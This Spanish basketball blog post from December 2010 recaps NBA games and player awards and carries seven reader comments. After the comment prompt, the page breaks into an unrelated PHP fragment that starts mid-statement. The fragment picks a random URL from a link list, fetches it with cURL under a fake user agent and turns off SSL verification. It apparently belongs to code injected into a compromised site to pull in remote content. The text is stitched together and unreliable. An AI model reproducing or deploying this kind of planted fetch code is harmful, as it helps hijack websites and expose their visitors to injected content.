La Crónica (11/12/2010)

12 de December de 2010 por txusma

Antes que nada disculparnos por haber faltado a nuestra cita diaria en el día de ayer. Una serie de problemas en alojamiento del blog provocaron que ayer estuviera caído la mayor parte del día y que se haya perdido el artículo del día anterior. Esperemos que no se repitan estos hechos con asiudidad pero lamentablemente, es algo, sobre lo que bien poco podemos hacer aparte de quejarnos y dar parte a la empresa.

Y pasando a lo que realmente nos interesa destacar que los Mavs ya llevan 12 victorias seguidas y se consolidan como el 2º mejor equipo de la liga detrás de San Antonio. Anoche dilapidaron una ventaja de 23 puntos pero acabaron llevándose la victoria frente a un equipo tan sólido como Utah (97-103). Nowitzki y Terry remataron en la orilla a unos Jazz que empataron el partido a falta de 4 minutos.

Pero en el Este hay dos equipos que se encuentran también en plana racha de victorias. Los Celtics apalizaron a los Bobcats (93-62) para lograr la décima y los Heat hicieron lo propio con los Kings para conseguir la octava (104-83). Los primeros no dieron ninguna oportunidad los pupilos de Larry Brown e incluso aprovecharon para dar descanso a sus mejores hombres. Erden volvió a salir como titular debido a las lesiones y de nuevo respondió. Y en los Heat funcionó a la perfección el Big Three y cuando eso pasa pocas oportunidades le quedan al equipo rival.

También en el Este, fácil victoria de los Bulls frente a Minnessota en un partido que ya estaba resuelto en la primera parte (82-113) y que les otorga la quinta victoria consecutiva; victoria de los Hawks contra Indiana (83-97) y de los Raptors, sin Calderon, en Detroit  por 120-116 tras una remontada de 25 puntos en el último cuarto y medio y con Bayless tocando el violín.

Finalmente, victorias también de Rockets (95-110 a los Cavs) y de los Grizzlies (in extremis, 84-83, a los Clippers).

PREMIOS

MVP: Por fuerza hemos de repartir el premio en el día de hoy. Candidatos: Jerryd Bayless, 31 puntos (10 de 12), 5 rebotes y 7 asistencias; Kevin Martin, 40 puntos (12-19); Dwyane Wade, 36 puntos, 6 rebotes y 6 asistencias; y Dirk Nowitzki, 31 puntos (10 de 12) y 15 rebotes.

Rookie: Blake Griffin a lo suyo con 19 puntos, 11 rebotes y 5 asistencias.

Sorpresa: La noticia de que Chris Kaman se perderá 3 semanas más es malísima para los Clippers pero relativamente buena para DeAndre Jordan. Ayer lo celebró con 10 puntos y 14 rebotes.

Decepción: Hacerlo tan bien tiene el riesgo de que la gente te señale los días que no estás tan fino. Exceptuando a Griffin, los rookies de los Clippers estuvieron desastrosos. 0 de 5 de Bledsoe y 0 de 0 de Aminu. ¿Puntos en total? 0, evidentemente.

Esfuerzo en vano: El increíble partidazo de Ben Wallace (23 puntos, con 10 de 13 en tiro, y 14 rebotes) se quedó en nada ante la remontanda canadiense. También estuvieron a punto de remontar Deron Williams (34 puntos y 6 asistencias) y los Jazz pero al final se quedaron en la orilla.

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Mavs y Heat los equipos más en forma actualmente.
    Que partidazo de Wallace y que forma tan patetica de perder por parte de los Pistons.
    Vi un trozo del Celtics-Bobcats, los de North Carolina fueron un juguete para los verdes, partido horrible de Pierce y de Gerald Wallace, y decente partido del rookie turco Erden con 10 ptos, 7 rbtes y 4 tapones, y de Glen Davis, que siempre aporta cosas interesantes al equipo desde el banco. Me parece que estos Celtics tienen mejor equipo que el año pasado, la duda, como siempre, la edad y las lesiones que pueda tener el veterano Big Three

      Citar

  2. Busky23 dice:
    #2

    Creo Lemontus que a esa lista de Mavs y Heat hay que añadir merecidamente a los Spurs y los Celtics,mucho más regulares en lo que llevamos de temporada. Los Heat ganarán muchos partidos,apuesto a que harán el mejor récord de la regular,pero en playoffs me decanto clarisimamente por los verdes,mucho más compensados y curtidos. De momento,veo a Garnett muy recuperado de esa rodilla,Pierce en sus números y Allen continua en su línea de buen juego,pedazo profesional. Rondo está a día de hoy entre los 5 mejores de la temporada y los días que no ha podido actuar,Robinson lo ha substituido de manera impecable,aportando muchos puntos y asistencias,suma a todo esto a Glen Davis y la vuelta de Perkins. No creo que Rivers tenga muchos dolores de cabeza.
    Otro equipo “on fire” son los Bulls,especialmente Derrick Rose,tremenda la temporada que se está cascando. Sudara sangre quien quiera ganar a los toros.
    Resaltable también la casta de Utah,a punto han estado hoy de conseguir otra remontada,Deron vs Paul???,este año,no hay debate.

      Citar

  3. Scriers dice:
    #3

    Mis sensaciones son que los Bulls acabarán cayendo por que Derrick Rose aún no la pasa tanto como debería. Creo que podría compensar con pases mucho más a su equipo.
    Luego estoy casi de acuerdo, Miami conseguirá al final muchas victorias, pero Boston es el equipo a batir del Este, ha encontrado una extraña alquimia en el grupo y te puede “asesinar” cualquier miembro de la rotación.
    Lo mejor de Detroit – Raptors, a parte de que es para matar a Detroit, el triple y la aportación de Ben Wallace.

      Citar

  4. HeiNeKeN dice:
    #4

    El 0-8 de DJ Agustine tambien es bastante decepcionante, mucho mas viendo lo que esta haciendo Felton en NY.

      Citar

  5. nacho dice:
    #5

    Me adelanto a lo que digáis mañana, mil perdones, pero estoy viendo el box score del NOH-PHI. Porcentajes pésimos, y PAUL 3 asistencias, claro, que ves la serie de sus compañeros y para llorar, 16 de 67, él 8 de 12. Y el equipo disolviéndose, llegó Jack y, en Toronto para arriba. uizás debamos mirarnos los análisis de aquellos días del trade.

      Citar

  6. Denise dice:
    #6

    He estado viendo el final del Lakers vs Nets. Partido igualado, que Odom ha desnivelado para los angelinos a un minuto del final gracias a un mate y a un triple. Sensacional campaña por el momento la de Lamar. Pau,a pesar de un nuevo doble-doble (15-11) ha estado muy fallón en el tiro (6-19). Por los Nets, Lopez ha estado también muy fallón, y Haris se ha quedado a 2 rebotes del triple doble.
    En el resto de partidos concluidos, los Sixers han sorprendido a los Hornets, que han hecho un pesimo segundo cuarto. En los Sixers, me está decepcionando Marreese Speights, ante un equipo sin mucho poderío en la pintura, debería tener minutos para ello porque tiene potencial (o yo, al menos se lo veía), sin embargo no termina de dar el salto y asumir protagonismo como por ejemplo Hibbert.
    Los Knicks también han gando a los Nuggets, con un gran Amare y con Fields, de lo mejorcito que hay de rookies ahora mismo. Melo, a pesar del doble-doble se ha tirado hasta las zapatillas, y Billups ha estado horrible.

      Citar

  7. Scriers dice:
    #7

    Fields es ahora mismo el tercer rookie del año, y depende del equipo y de lo que se busque, yo diría que el segundo. Está claro que en base al talento Griffin y Wall van por encima, pero Fields aporta mucha seguridad y un poco de todo al equipo. Parecen los demás jugadores cómodos con él al lado. La clave para estos jugadores de este “corte” es que cuando lleven 3 partidos bajando prestaciones no se les dé de lado, sino que se apueste aún así por ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>